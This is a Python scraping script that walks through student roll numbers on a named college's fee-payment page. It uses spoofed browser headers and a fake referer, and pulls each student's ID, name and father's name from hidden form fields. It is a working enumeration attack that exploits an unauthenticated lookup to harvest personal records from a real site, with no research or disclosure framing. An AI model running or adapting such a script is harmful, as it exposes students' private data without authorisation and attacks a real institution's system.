import requests
from bs4 import BeautifulSoup

# Chrome browser fake headers
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
    "Accept-Language": "en-US,en;q=0.9",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Referer": "https://www.google.com/",
    "Connection": "keep-alive"
}

# Roll range modify as needed
for i in range(201, 202):  # 22EC002 to 22EC040
    roll = f"22EC{str(i).zfill(3)}"
    URL = f"https://titsbhiwani.ac.in/2019/payment/payfeepart.php?admno={roll}&partfee=FF"
    
    try:
        response = requests.get(URL, headers=headers, timeout=10)

        if response.status_code != 200:
            print(f"{roll} → ❌ Page Not Found\n")
            continue

        soup = BeautifulSoup(response.text, "html.parser")

        cust_id = soup.find("input", {"name": "custID"})
        cust_name = soup.find("input", {"name": "custname"})
        cust_father = soup.find("input", {"name": "custfathername"})

        if cust_id and cust_name and cust_father:
            id_val = cust_id.get("value", "").strip()
            name_val = cust_name.get("value", "").strip()
            father_val = cust_father.get("value", "").strip()

            if name_val != "":
                print(f"{id_val},{name_val},{father_val}")
        else:
            print(f"{roll} → ❌ Required Tags Missing\n")

    except Exception as e:
        print(f"⚠️ Error for {roll}: {e}\n")
